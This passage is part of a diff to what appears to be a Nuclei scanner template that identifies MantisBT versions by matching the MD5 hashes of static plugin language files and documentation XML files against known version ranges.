"(\"699393b817e53cd858e7bdbaaaa6bc98\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_qqq.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"2350f71a56b86498b2a063eac3b2f008\" == md5(body))" + - type: dsl + name: 1.3.5 - 2.0.1 + dsl: + - "(\"0b11c45a04743dd0792b63c930e86fdb\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"a990e7de6eb0d597968eb8abdbefe090\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"b9ed6a06dba8336e167d44e816060030\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"fdbca1a82f6295d93f8972996c8b71ef\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"3147dd3194cec165876e9f6a7a1da4c0\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"b29e305d961dd60b2c14754abee9f5ed\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"b5d4c0492486269b95030646a64399bc\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"6a149f488d32ea4dafc60a0dc6015ea8\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"71302646fdbcf605c36fc08dd516529d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_finnish.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"70427f180e46c067a6df9812d503ebcd\" == md5(body))" + - type: dsl + name: 1.3.2 - 2.0.1 + dsl: + - "(\"eb70497630410d6374ee101b4dc5aa07\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"fd8f20b2702760b817476479c802b176\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"2a21ef9d464e45612a9dbb247b74d763\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"94a2621e0c64cd0cef8b7b6ec69bd377\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"3acd3d932544faf6908b68af1f7eb7c7\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"58768cfcda5f6b1ba95ea72209f9ccc4\" == md5(body))" + - type: dsl + name: 
1.2.16 + dsl: + - "(\"9a550380d2d525196b5d3e2df593d133\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"28332a4bbccb6ebbeb6c83d8b5a974e7\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"2fc2a79d6a8bde831d5f1727b6533ca9\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"165f63081596cd9c15e62f2caacd45a1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_norwegian_nynorsk.txt" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"dcbf3dbdff72ebe055368ce1a3093ec9\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"8c8c6b4996adb77fc9a534540c178dee\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"1b90916472f0a43afb2d97c3887442f3\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"cb4620d53ece892624ed91eb2742685a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_urdu.txt" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"f586589e5d6c3fcb28d5fd21517c53a3\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"b37bf32e45dc082e857dc54485d69037\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"c5f0e4c44ca51067ffe2f76479738ff9\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"339b8aee583fec7546c7ed946135da3e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/filters.xml" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"46061571efdfb3c7543424fbc9ebf1ef\" == md5(body))" + - type: dsl + name: 1.3.1 - 2.0.1 + dsl: + - "(\"3129e10e5f2311920b1f5ffd388c7382\" == md5(body))" + - type: dsl + name: 1.3.0 + dsl: + - "(\"1017c5adb9460d054cdc62e1d733a242\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Events.xml" + + matchers: + - type: dsl + name: 2.6.0 - 2.24.3 + dsl: + - "(\"ff76c7b6a40a7d2b11d393a7d7ab8ca5\" == md5(body))" + - 
type: dsl + name: 1.3.1 - 2.5.2 + dsl: + - "(\"a90a7cb94a85b640fd70149727fd1408\" == md5(body))" + - type: dsl + name: 1.3.0 + dsl: + - "(\"dae1bdc171c445d8f2e8eda0b6ba9c4b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Events_Reference.xml" + + matchers: + - type: dsl + name: 2.4.0 - 2.24.3 + dsl: + - "(\"fd058ba54ac9a2c9056e109e3f7b8faf\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.3.3 + dsl: + - "(\"d7002f178e62efabf257cfa99cffc363\" == md5(body))" + - type: dsl + name: 1.3.1 - 2.2.4 + dsl: + - "(\"ce21a1d21b809c3f7d3013d063d4d733\" == md5(body))" + - type: dsl + name: 1.3.0 + dsl: + - "(\"14546badf7796fd86456af9dec5b2fc8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/status.xml" + + matchers: + - type: dsl + name: 2.4.0 - 2.7.1 + dsl: + - "(\"819b64c2b2ebfcbb5a9979dabd346c67\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.3.3 + dsl: + - "(\"3f95705a5c171445aa9f9b7b1be08214\" == md5(body))" + - type: dsl + name: 1.3.1 - 1.3.3 + dsl: + - "(\"7469fa9a20b23859c5e55a707688b071\" == md5(body))" + - type: dsl + name: 1.3.0 + dsl: + - "(\"fa7d2c348b6c251f04ea322a552bc338\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.24.3 + dsl: + - "(\"355d8e97db1a104e5d346dbca0dc29ec\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_czech.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.8.1 + dsl: + - "(\"e336da6ea2f724b6322617ed5f9e3add\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"0c4364afddb00859b3d2e033efa4f959\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"f1c30214bc18ff8c62cc4b599925eb50\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"63649114e1d7690c9afec89cbca80f36\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"bfb407e44cd325a7bb7fd465975c6df4\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"b9e0db58378abd703b0d7c65eea31390\" == 
md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"cf91ad0022e8320c4b3f11cc440cccae\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"3c8191dd1426e5490ded57aea3f49566\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.24.3 + dsl: + - "(\"4abb7cf57bd10b36077ee9490be72ebb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_korean.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.13.2 + dsl: + - "(\"1f98d7eb3ebd0b38a868e460585ef6eb\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"8451cff8839fa32df1013de1f1f4068a\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"bb0c1ca057e569387c59a820a5b2eb4d\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"a70401a97cb2f05199d9d0c03c062e1b\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.18.1 + dsl: + - "(\"49ec6c6f282a90ada5fb760c9ba88404\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.24.3 + dsl: + - "(\"f0807586ba41a109d532e600eb0e6432\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_portuguese_standard.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.10.1 + dsl: + - "(\"554067755a8a9c7fe0fdc82bf3d753f7\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"a5710670d27fceb7b65f685e577af976\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"6057c4c033556941265ac18d4dd5eabb\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"34267cb53b06791eacb79f4d58cd61ee\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"aa026ee373174912bbc357f6b06c14eb\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"d0ab514ab5bebe1912f113e12724561d\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"81b72c2ba849889b2f481bf3684ee3cf\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"c4295c3325c04daaf7665ec371899ad9\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 
+ dsl: + - "(\"2c20d34d05adc7d209ea7604d21baa59\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"fd400410c1a7975c46a66098101c1094\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.21.3 + dsl: + - "(\"df8d164cbf78d43d0e764cd58a8d0c39\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"303c5417dd2d324fef2f740c49494393\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"e49160dcad34c7fd4381b5605fe69a50\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_ukrainian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.21.3 + dsl: + - "(\"3d1ec2add80921bbec8ec8327b4d514f\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.5.2 + dsl: + - "(\"176dd88f763a101dd205ff1530aad72d\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"e80a53b654f7c0fc6dc14a5050400b8b\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"5436e9854e48246670039dada8c5a31a\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"df4dcccc362cc054dc240e6ceffd69c1\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"664b265ac707016e43286c1dc67e9763\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"d8f7ef7e7ac875030257ac5d79a2951b\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"4e24493444369ecf19cbcb7119f1ce2e\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"30cf7983b6faebadcc54e4df6b09ebdc\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"fefe4d7d3f990bb597b0d880c51e55a2\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_bulgarian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.19.1 + dsl: + - "(\"2fc01cd077f69fb91b6b71d410394a6b\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.5.2 + dsl: + - "(\"d2f15665d2ac6d14b661f0227051d830\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.3.3 + dsl: + - "(\"1f79b95e462d1fced258433dfc27c6fc\" == 
md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"c9cc0eea0caf1afd43eb4725f2054007\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"9e4f93089385093697c79e9d132bfa51\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"36e75d6c97199b838b20546005a039f0\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"d5321698e703ba1ec5a159f2bd570101\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"abb0e7b567f82a04a3ac5c6018321352\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"aaa5b4ae72aab41811b7fe77587db4a4\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"a990aaedf1470af3f50fcf15089258b3\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"f662bffd8f57f45b20907b60cbba330f\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"6c9478728a0cd9a47c5f6a5de6c30291\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"7fc241e056f6d21fe4ca583363f65228\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"ff3839022de91762b10d9fbfdc3df3d3\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"4fd5c047a6db9d9f55b6d24a2d6dfb7f\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"56342cb837ab30c663b86ee52221fe38\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"2c5cdbcb6ce3d1b32a1a3f3bbb534f7b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_portuguese_brazil.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.19.1 + dsl: + - "(\"ca8910b5c809c2191c4900b371b6ed5a\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.5.2 + dsl: + - "(\"61e6a66f5fcef0342d71ece58b465353\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.2.4 + dsl: + - "(\"15c133752f82d3d1ecc9c0fa798e43eb\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"46488963b619ac6bacfba935fbbc616a\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - 
"(\"26fad0fced382be321b1a817d4e67598\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"9ba2fd5239445402b6f6bd6e296e93f1\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"f382749c3afcfe7505ff0a4ff8f8e2ae\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"ae6868e5ed144f61481a798fe571d061\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"86e65351447e73c87d320ab411c67516\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"66ff9b420c738bd859068686298ba72c\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"c3412da658c9ed8a5abba61819493bf6\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"dc840933f2b45a68a3b3a50dbbb357b0\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"2a10500ad642a1d7611fa90dfac0a283\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"84b4d2f3400134cfd72e40a6b672e854\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_spanish.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.18.1 + dsl: + - "(\"dbad7de0a4ef634c0bf43e4f4887433c\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.5.2 + dsl: + - "(\"db2db6bafd2974e6b8451131198e0fcc\" == md5(body))" + - type: dsl + name: 1.3.5 - 2.0.1 + dsl: + - "(\"cf6343e1ff9913b237d4cd1e6183b795\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"e16e8e9b8ee6915dee2e92c4c34e066f\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"69275b7a9c02bd673c468300c8463738\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"b66ad86127695f43816f4a00735dcea8\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"27d9e46f82cc3746b30845340431bd69\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"e94f6e3b6b34f47e97afcf87655eb29d\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"7bac3180dbb5fe5fdbff54f66c6e3dcb\" == md5(body))" + - type: dsl + name: 
1.2.17 - 1.2.20 + dsl: + - "(\"006ad1d109958226b525ecd13e3dd32d\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"9c5813ea00e1fb1ec6dfe87a0fb35022\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"3e007ab34b7966eb99fed4893b0acf13\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"6749629694747f91ee845ddf6f42231b\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"77198aadf16ff6f2c9677523f7fc75ff\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"80b45913b96866d183f96fdc83314917\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"8f7a791993ea8a4416308f64e0ec24d2\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_ukrainian.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.22.2 + dsl: + - "(\"dd39e189f4c91e83d7fd9259836fe97a\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"e7f35f45e741c1ba8f97d3e84c50bd9d\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"81f3b765bcbec6a340f2d319c117fff3\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"75d749bfc01bb090767f5e275fdb29ad\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_hebrew.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.22.2 + dsl: + - "(\"e8d468861f3c43d58a62a008cda4b0b2\" == md5(body))" + - type: dsl + name: 1.3.2 - 2.0.1 + dsl: + - "(\"745c346936f2c9b8d4a9af5b1d777d2f\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"476e0396cbf6ec0aba0f4d866512c927\" == md5(body))" + - type: dsl + name: 1.2.9 + dsl: + - "(\"b859f529a9788ca515fa305d669c8b12\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"ce9b6e66e4cfd0b0582d9d57c48065dc\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"a10d7f596a0241ec623998959100fc3b\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"561c5ea46e5c2941445a29cfa85ce763\" == 
md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"4f6f647c5272da6e2190626ae726d611\" == md5(body))" + - type: dsl + name: 1.2.10 - 1.2.12 + dsl: + - "(\"32053d456d5dbf96b8086dcbd63e4e54\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"a82514ba731a2db5188e78c768e9aaad\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"26c2ceb19ada5673640d5f47a028335b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_lithuanian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.22.2 + dsl: + - "(\"b6ba6a71fe0bbc9d1d207e22bdf1fd4a\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.5.2 + dsl: + - "(\"9baee5efa06a891e79dc8d25a768501c\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"5ecc272bf125306b4d508fffb94e22dc\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"af4f75db882301434402c66ce1686b40\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"63764d842f8306f180f91220d1e9f083\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"c71f8f2c247e3411762fce8ba90550f8\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"f14d13312571a108b4d92ecba72295bb\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"160ffcc4f9d3eae1dc06789b1f6c8531\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"22c788e9cab47f3c1ea510f6429959af\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"6393f1e3a4bd88076e8532f13fd6da5d\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"1de21ab1ee9eb136eab794d23ea92f40\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"cc068b8330f3ddecbaccf9a0ff7e19a3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_galician.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.22.2 + dsl: + - "(\"7480e991289ee873ecfdbc2158c655db\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.5.2 + dsl: + - 
"(\"d1f07190cb4778008b15913b2548ac17\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"ca1ab64d21d9a692216442055640a12b\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"a4e64d8232bc462044179f3c540f91be\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"530bbcdc763107a65b7d8094c0f7aa41\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"6bc1d82b3f64071902ab249e45b63d67\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.11 + dsl: + - "(\"a5c663e6b15f6fd1431a5f7d1c84235f\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"b962a73720c30060c678147507c75af1\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"6fccbe829b864d6493d5d375ab6211f6\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"b8cc63f38f90339bb7df71b55f80af9e\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"8519e22a726a7741d209ba8027295119\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"644c5976e51ee4486c94e1ccc83ddae7\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"5222415f9fc5fa9643ca35c5e9dd9b16\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"0cba7f1b5d12289e8a17e0cfbff15cc5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_dutch.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.12.2 + dsl: + - "(\"ccefcbd6bf5fc90b51e23c33410f2e8c\" == md5(body))" + - type: dsl + name: 1.3.2 - 2.0.1 + dsl: + - "(\"c540e287f011ce06a41da9701bed0290\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"72473c394f4bc2656608149b2f91661b\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.11 + dsl: + - "(\"275144b2d5c3df15f50c0e1f7255b7f3\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"41682bf085d5aa9332ac84d3febb8c1c\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"63dede4ef85a800e7526cd42b1a6d671\" == md5(body))" + - type: dsl + name: 
1.2.17 - 1.2.20 + dsl: + - "(\"d4e54825fab2a13e6fe49f93f507b144\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"956d7eea9fc92f9c025589481927a997\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"c7bb845d27c83f4617a36459f01f3e18\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"ef79baf68be230f7636706b678936e4b\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.22.2 + dsl: + - "(\"311f523cbc1019ede7b17767b2d1fe39\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"dcb9c661b6afd8652330d1d628d5d65d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_interlingua.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.22.2 + dsl: + - "(\"8d518d31666725f9dc1c6e8edb430f03\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"05dccc39f7c1e7a937906aa2f428386a\" == md5(body))" + - type: dsl + name: 1.3.5 - 2.0.1 + dsl: + - "(\"ab83665f4a4b796399af8cc9e8bce5a6\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.4 + dsl: + - "(\"71f8d019bc739b8c6d98cb61b8c0c954\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"7b13b3afabb1ed7a04050d40109a2884\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"ad6dd27efc7e576e14b455bf441b311a\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"e1c7a445af80f1015906d9be6078faac\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"aafd27eec12c5771536eb46bfed383b9\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"8c977855e40c0d047c9425386c504a50\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"ffe0bfe2f38fb5da0a4a90f863a4b150\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"5769fd3444c5473aaea529d109bb9063\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_icelandic.txt" + + matchers: + - type: dsl + name: 2.0.0 - 2.13.2 + dsl: + - "(\"40ae7cdf88ae6277f2f67f8c46af8992\" == 
md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"3ec3ed9fb8f61c767713769a37ce1f6d\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"12f14695e9c7a04193d3fe5595b505d3\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"3d6cc75e71433eba9799149fc0e14c21\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.20.1 + dsl: + - "(\"150d4f140d6321876cfa5a40056f6ee6\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.22.2 + dsl: + - "(\"2cdf31ccc3d2420c582866fea25a0683\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"28b6e4ba893adccaa57a8b0d0971190c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/issues.xml" + + matchers: + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"0f0a30cce4bdb0ee416d1b939b9ca779\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_persian.txt" + + matchers: + - type: dsl + name: 2.22.0 - 2.23.1 + dsl: + - "(\"5ac2f1b3d1641f83ddc55de1709bfcbc\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"2f9981140bb9f61809bba91340072428\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/misc.xml" + + matchers: + - type: dsl + name: 1.3.6 - 2.21.3 + dsl: + - "(\"632ffaaa7a981b6b001d69d94d1c9e1b\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.0 + dsl: + - "(\"e50df586cdd84c97152da054d5198230\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.23.1 + dsl: + - "(\"228397b5b994b8f8f0c5c2029ec410ca\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"1d7c734d9f8b53758e15c93f434fae65\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/fields.xml" + + matchers: + - type: dsl + name: 2.0.0 - 